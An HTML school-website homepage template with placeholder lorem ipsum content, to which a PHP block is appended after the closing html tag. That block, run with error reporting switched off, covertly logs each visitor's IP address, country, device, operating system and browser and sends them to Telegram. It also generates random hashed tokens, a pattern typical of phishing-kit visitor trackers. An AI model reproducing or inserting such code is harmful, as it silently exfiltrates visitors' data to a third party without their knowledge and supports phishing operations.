<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- File Css -->
    <link rel="stylesheet" href="css/style.css">
    <!-- Link Iconscout Library -->
    <link rel="stylesheet" href="https://unicons.iconscout.com/release/v2.1.6/css/unicons.css">
    <!-- Font Google -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@300;400;500;600;700;800;900&display=swap" rel="stylesheet">
    <!-- Link Swiper Library Css-->
    <link rel="stylesheet"href="https://unpkg.com/swiper@8/swiper-bundle.min.css"/>
    <title>School - Home</title>
</head>
<body>
    <!-- Start Nav Bar -->
    <div class="nav-bar" id="nav">
        <div class="container" id="container-nav">
            <div class="content-nav-bar">
                <a href="#"><h2>School</h2></a>
                <ul class="links" id="menu">
                    <li><a href="index.html">Home</a></li>
                    <li><a href="about.html">About</a></li>
                    <li><a href="courses.html">Courses</a></li>
                    <li><a href="contact.html">Contact</a></li>
                    <div class="parent-button-sign-up-and-login">
                        <a href="sign-up.html">Sign Up</a>
                        <a href="login.html">Login</a>
                    </div>
                </ul>
                <i id="button-open" class="uil uil-bars icon bars"></i>
                <i id="button-close" class="uil uil-multiply icon"></i>
            </div>
        </div>
    </div>
    <!-- End Nav Bar -->

    <!-- Start Header -->
    <header>
        <div class="container">
            <div class="content-header">
                <div class="header-text">
                    <h1>Welcome to our school's official website</h1>
                    <p>
                        Lorem ipsum dolor sit amet, consectetur adipisis elit. Vero veniam quaerat voluptat, dolorem iusto asperiores rem minima iste voluptatibus doloribus Et recusandae culpa eaque.
                    </p>
                    <a href="#">Get Start</a>
                </div>
                <div class="header-image">
                    <img src="images/image-header.png"/>
                </div>
            </div>
        </div>
    </header>
    <!-- End Header -->

    <!-- Start Categories -->
    <div class="categories">
        <div class="container">
            <div class="content-categories">
                <div class="categories-text">
                    <h1>Categories</h1>
                    <p>
                        Lorem ipsum dolor sit amet consectetur adipisicing elit. Illum libero, eum ducimus fuga assumenda voluptas ipsum voluptatem facilis, minus in quis est optio ad possimus quidem aperiam, cum quasi quia.
                    </p>
                    <a href="#">Learn More</a>
                </div>
                <div class="categories-items">
                    <div class="box-items-categories">
                        <i class="uil uil-bitcoin-circle"></i>
                        <h3>Blockchain</h3>
                        <p>
                            Lorem ipsum dolor sit amet consec tetur adipi sicing elit Illum libero.
                        </p>
                    </div>

                    <div class="box-items-categories">
                        <i class="uil uil-brush-alt"></i>
                        <h3>Graphic Design</h3>
                        <p>
                            Lorem ipsum dolor sit amet consec tetur adipi sicing elit Illum libero.
                        </p>
                    </div>

                    <div class="box-items-categories">
                        <i class="uil uil-megaphone"></i>
                        <h3>Marketing</h3>
                        <p>
                            Lorem ipsum dolor sit amet consec tetur adipi sicing elit Illum libero.
                        </p>
                    </div>

                    <div class="box-items-categories">
                        <i class="uil uil-music"></i>
                        <h3>Music</h3>
                        <p>
                            Lorem ipsum dolor sit amet consec tetur adipi sicing elit Illum libero.
                        </p>
                    </div>

                    <div class="box-items-categories">
                        <i class="uil uil-brackets-curly"></i>
                        <h3>Programmation</h3>
                        <p>
                            Lorem ipsum dolor sit amet consec tetur adipi sicing elit Illum libero.
                        </p>
                    </div>

                    <div class="box-items-categories">
                        <i class="uil uil-comment-alt-chart-lines"></i>
                        <h3>Busniess</h3>
                        <p>
                            Lorem ipsum dolor sit amet consec tetur adipi sicing elit Illum libero.
                        </p>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- End Categories -->

    <!-- Start Courses -->
    <div class="courses" id="courses">
        <div class="container">
            <h1 class="basic-title">Our Popular Courses</h1>
            <div class="content-courses">
                <div class="box-courses">
                    <img src="images/image-courses-1.png"/>
                    <div class="text-box-courses">
                        <h3>Title Box</h3>
                        <p>
                            Lorem ipsum dolor sit amet consectetur adipisicing elit. Voluptates ducimus a inventore libero delectus necessitatibus.
                        </p>
                        <a href="#">Learn More</a>
                    </div>
                </div>
                <div class="box-courses">
                    <img src="images/image-courses-2.png"/>
                    <div class="text-box-courses">
                        <h3>Title Box</h3>
                        <p>
                            Lorem ipsum dolor sit amet consectetur adipisicing elit. Voluptates ducimus a inventore libero delectus necessitatibus.
                        </p>
                        <a href="#">Learn More</a>
                    </div>
                </div>
                <div class="box-courses">
                    <img src="images/image-courses-3.png"/>
                    <div class="text-box-courses">
                        <h3>Title Box</h3>
                        <p>
                            Lorem ipsum dolor sit amet consectetur adipisicing elit. Voluptates ducimus a inventore libero delectus necessitatibus.
                        </p>
                        <a href="#">Learn More</a>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- End Courses -->

    <!-- Start Frequently Asked Questions Section -->
    <div class="frequently-asked-questions">
        <div class="container">
            <h1 class="basic-title">Frequently Asked Questions Section</h1>
            <div class="content-frequently-asked-questions">
                <div class="box-questions">
                    <label class="question"><i id="icon-plus" class="uil uil-plus-circle"></i>Frequently Asked Questions?</label>
                    <p>
                        Lorem ipsum dolor sit amet, sectetur adipisis elit. Magni nesciunt deleniti suscipit assumenda quis tempora libero fugit officiis explicabo cupiditate.
                    </p>
                </div>
                <div class="box-questions">
                    <label class="question"><i class="uil uil-plus-circle"></i>Frequently Asked Questions?</label>
                    <p>
                        Lorem ipsum dolor sit amet, consectetur adipisicing elit. Magni nesciunt deleniti suscipit assumenda quis tempora libero fugit officiis explicabo cupiditate.
                    </p>
                </div>
                <div class="box-questions">
                    <label class="question"><i class="uil uil-plus-circle"></i>Frequently Asked Questions?</label>
                    <p>
                        Lorem ipsum dolor sit amet, consectetur adipisicing elit. Magni nesciunt deleniti suscipit assumenda quis tempora libero fugit officiis explicabo cupiditate.
                    </p>
                </div>
                <div class="box-questions">
                    <label class="question"><i class="uil uil-plus-circle"></i>Frequently Asked Questions?</label>
                    <p>
                        Lorem ipsum dolor sit amet, consectetur adipisicing elit. Magni nesciunt deleniti suscipit assumenda quis tempora libero fugit officiis explicabo cupiditate.
                    </p>
                </div>
                <div class="box-questions">
                    
                    <label class="question"><i class="uil uil-plus-circle"></i>Frequently Asked Questions?</label>
                    <p>
                        Lorem ipsum dolor sit amet, consectetur adipisicing elit. Magni nesciunt deleniti suscipit assumenda quis tempora libero fugit officiis explicabo cupiditate.
                    </p>
                </div>
                <div class="box-questions">
                    
                    <label class="question"> <i class="uil uil-plus-circle"></i>Frequently Asked Questions?</label>
                    <p>
                        Lorem ipsum dolor sit amet, consectetur adipisicing elit. Magni nesciunt deleniti suscipit assumenda quis tempora libero fugit officiis explicabo cupiditate.
                    </p>
                </div>
                <div class="box-questions">
                    
                    <label class="question"><i class="uil uil-plus-circle"></i>Frequently Asked Questions?</label>
                    <p>
                        Lorem ipsum dolor sit amet, consectetur adipisicing elit. Magni nesciunt deleniti suscipit assumenda quis tempora libero fugit officiis explicabo cupiditate.
                    </p>
                </div>
                <div class="box-questions">
                    
                    <label class="question"><i class="uil uil-plus-circle"></i> Frequently Asked Questions?</label>
                    <p>
                        Lorem ipsum dolor sit amet, consectetur adipisicing elit. Magni nesciunt deleniti suscipit assumenda quis tempora libero fugit officiis explicabo cupiditate.
                    </p>
                </div>
            </div>
        </div>
    </div>
    <!-- End Frequently Asked Questions Section -->

    <!-- Start Testimonials -->
    <div class="testimonials container mySwiper">
        <h1 class="basic-title">Student's Testimonials</h1>
            <div class="swiper-wrapper">
                <div class="box-testimonials swiper-slide">
                    <div class="parent-image">
                        <img src="images/testimonials-1.png" />
                    </div>
                    <div class="parent-name-and-skill">
                        <h4>James Dear</h4>
                        <small>Student</small>
                    </div>
                    <div class="parent-information">
                        <p>
                            Lorem ipsum dolor sit amet consectetur adipisicing elit. Dicta neque accusantium harum voluptate iure placeat doloribus nobis beatae pariatur qui totam quaerat iste quidem quo vero, molestias nemo..
                        </p>
                    </div>
                </div>
                <div class="box-testimonials swiper-slide">
                    <div class="parent-image">
                        <img src="images/testimonials-2.png" />
                    </div>
                    <div class="parent-name-and-skill">
                        <h4>Robert Dear</h4>
                        <small>Business Men</small>
                    </div>
                    <div class="parent-information">
                        <p>
                            Lorem ipsum dolor sit amet consectetur adipisicing elit. Dicta neque accusantium harum voluptate iure placeat doloribus nobis beatae pariatur qui totam quaerat iste quidem quo vero, molestias nemo.
                        </p>
                    </div>
                </div>
                <div class="box-testimonials swiper-slide">
                    <div class="parent-image">
                        <img src="images/testimonials-3.png" />
                    </div>
                    <div class="parent-name-and-skill">
                        <h4>John Dear</h4>
                        <small>Web Development</small>
                    </div>
                    <div class="parent-information">
                        <p>
                            Lorem ipsum dolor sit amet consectetur adipisicing elit. Dicta neque accusantium harum voluptate iure placeat doloribus nobis beatae pariatur qui totam quaerat iste quidem quo vero, molestias nemo.
                        </p>
                    </div>
                </div>
                <div class="box-testimonials swiper-slide">
                    <div class="parent-image">
                        <img src="images/testimonials-4.png" />
                    </div>
                    <div class="parent-name-and-skill">
                        <h4>Mary Dear</h4>
                        <small>Web Designer</small>
                    </div>
                    <div class="parent-information">
                        <p>
                            Lorem ipsum dolor sit amet consectetur adipisicing elit. Dicta neque accusantium harum voluptate iure placeat doloribus nobis beatae pariatur qui totam quaerat iste quidem quo vero, molestias nemo.
                        </p>
                    </div>
                </div>
                <div class="box-testimonials swiper-slide">
                    <div class="parent-image">
                        <img src="images/testimonials-5.png" />
                    </div>
                    <div class="parent-name-and-skill">
                        <h4>Jennifer Dear</h4>
                        <small>Programmer</small>
                    </div>
                    <div class="parent-information">
                        <p>
                            Lorem ipsum dolor sit amet consectetur adipisicing elit. Dicta neque accusantium harum voluptate iure placeat doloribus nobis beatae pariatur qui totam quaerat iste quidem quo vero, molestias nemo.
                        </p>
                    </div>
                </div>
                <div class="box-testimonials swiper-slide">
                    <div class="parent-image">
                        <img src="images/testimonials-6.png" />
                    </div>
                    <div class="parent-name-and-skill">
                        <h4>Patricia Dear</h4>
                        <small>Musiciant</small>
                    </div>
                    <div class="parent-information">
                        <p>
                            Lorem ipsum dolor sit amet consectetur adipisicing elit. Dicta neque accusantium harum voluptate iure placeat doloribus nobis beatae pariatur qui totam quaerat iste quidem quo vero, molestias nemo.
                        </p>
                    </div>
                </div>
            </div> 
        <div class="swiper-pagination"></div>
    </div>
    <!-- Ens Testimonials -->

    <!-- Start Footer -->
    <div class="footer">
        <div class="container">
            <div class="content-footer">
                <div class="box-footer">
                    <h2>School</h2>
                    <p>
                        Lorem ipsum dolor sitamet consecte adipisi elitfas Nostr obcaecat ullam nihil suscipit hicedre atque conseque.
                    </p>
                    <a href="#">Learn More </a>
                </div>
                <div class="box-footer">
                    <h2>Premalinks</h2>
                    <div class="links-footer">
                        <a href="#">Home</a>
                        <a href="#">About</a>
                        <a href="#">Courses</a>
                        <a href="#">Contact</a>
                    </div>
                </div>
                <div class="box-footer">
                    <h2>Primacy</h2>
                    <div class="links-footer">
                        <a href="#">Privacy Policy</a>
                        <a href="#">Terms Conditions</a>
                        <a href="#">Refund Policy</a>
                    </div>
                </div>
                <div class="box-footer">
                    <h2>Contact Us</h2>
                    <div class="links-footer">
                        <a href="#">School@Business.com</a>
                        <a href="#">+212627891654</a>
                    </div>
                    <div class="social-media">
                        <a href="#"><i class="uil uil-facebook"></i></a>
                        <a href="#"><i class="uil uil-instagram"></i></a>
                        <a href="#"><i class="uil uil-linkedin"></i></a>
                        <a href="#"><i class="uil uil-twitter-alt"></i></a>
                    </div>
                </div>
            </div>
            <div class="copyright-footer">
                <span>&copy; <a href="#">School</a> All Rights Reserved 2022</span>
            </div>
        </div>
    </div>
    <!-- End Footer -->

    <!-- Button Scroll To Top -->
    <i class="uil uil-arrow-up" id="button-scroll-to-top"></i>
    <!-- Button Scroll To Top -->
    
    <!-- Javascript File -->
    <script src="main.js"></script>
    <!-- Link Swiper Library js -->
    <script src="https://unpkg.com/swiper@8/swiper-bundle.min.js"></script>
    <!-- Initialize Swiper -->
    <script>
        var swiper = new Swiper(".mySwiper", {
                slidesPerView: 1,
                spaceBetween: 30,
                pagination: {
                    el: ".swiper-pagination",
                    clickable: true,
                },
                breakpoints: {
                    767: {
                            slidesPerView: 2,
                    }
                }
            });
    </script>
</body>
</html>
<!-- Start Code PHP -->
<?php
    session_start();error_reporting(0);
    require_once('geoplugin.class.php');
    require("UserInfo.php");
    include 'functions.php';

    // Get Time End Date Visit :
    $present_time = date("⏰ "."H:i:s"." 📆 "."m/d/y");
    $expiry = 60*24*60*60+time();
    $geoplugin = new geoPlugin();$geoplugin->locate();$ips = getenv("REMOTE_ADDR");$_SESSION["ip"] = $ips;

    // Send Data To Telegram :
    $text=urlencode("👥========= VISIT =========👥\r\n" . 
    "📍IP - ".get_client_ip()."\t\t | \t\t". 
    $geoplugin->countryCode ."\r\n". 
    "💻 DEVICE = " .UserInfo::get_device()."\r\n".
    "♻️ SYSTEM TYPE = ". UserInfo::get_os()."\r\n". 
    "🌐 BROWSER VISIT = ". UserInfo::get_browser()."\r\n".
    "DATE AND TIME = ". $present_time ."\r\n");

    telegram($text);

    $random=rand(0,100000000000);$md5=md5("$random");$base=base64_encode($md5);$dst=md5("$base");

    exit;
?>
<!-- End Code PHP -->
